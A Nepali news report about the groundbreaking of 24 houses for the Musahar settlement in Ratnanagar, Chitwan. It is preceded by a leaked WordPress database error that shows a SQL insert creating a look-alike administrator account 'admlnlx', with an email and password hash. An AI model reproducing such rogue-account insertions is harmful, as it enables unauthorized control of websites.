WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BH47AN/T9c4bs2X2Su3E/4Epx3YbHx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:21:31', '', 'admlnlx', 'admlnlx')
चितवन , पौष २९
रत्ननगर ५ चित्रसारी स्थित माझी मुसहर टोल निर्माण गर्न लागिएको आवास व्यवस्थापन कार्यको शुक्रवार शिलान्यास गरिएको छ । आवास व्यवस्थापन कार्यक्रम अन्र्तगत मुसहर बस्तीमा २४ वटा घर निर्माण गर्न लागिएको छ । रत्ननगर नगरपालिकाका सामाजिक विकास अधिकृत पुष्पराज आचार्यले आवास व्यवस्थापन कार्यको शिलान्यास गरेका थिए । २४ वटा घरधुरी मध्ये पहिलो चरणमा ११ वटा घर निर्माण गर्न लागिएको आचार्यले बताए ।
त्यसका लागि रत्ननगर नगरपालिका, शहरी गरिब सहयोग कोषबाट आकृति महिला बचत तथा ऋण सहकारी संस्था मार्फत ११ लाख रुपैया ऋण लगानी गरिने सामाजिक विकास शाखा प्रमुख आचार्यले जानकारी दिए । कार्यक्रममा लुमन्ती आवासका लागि सहयोग समुह रत्ननगरका कार्यक्षेत्र संयोजक शिंह लामा, नेपाल सुकुम्बासी सुधार समितिका अध्यक्ष फुलमान तामाङ र आकृति सहकारीका अध्यक्ष फुलकुमारी लामाले मन्तव्य व्यक्त गरेका थिए । टोल विकास संस्थाका अध्यक्ष वासमती माझीको अध्यक्षतामा कार्यक्रम भएको थियो । कार्यक्रममा लुमन्ती आवासको लागि सहयोग समुह, नेपाल सुकुम्वासी सुधार समिति रत्ननगर र आकृति महिला बचत तथा ऋण सहकारी संस्था लि. का पदाधिकारीहरुको उपस्थिति रहेको थियो ।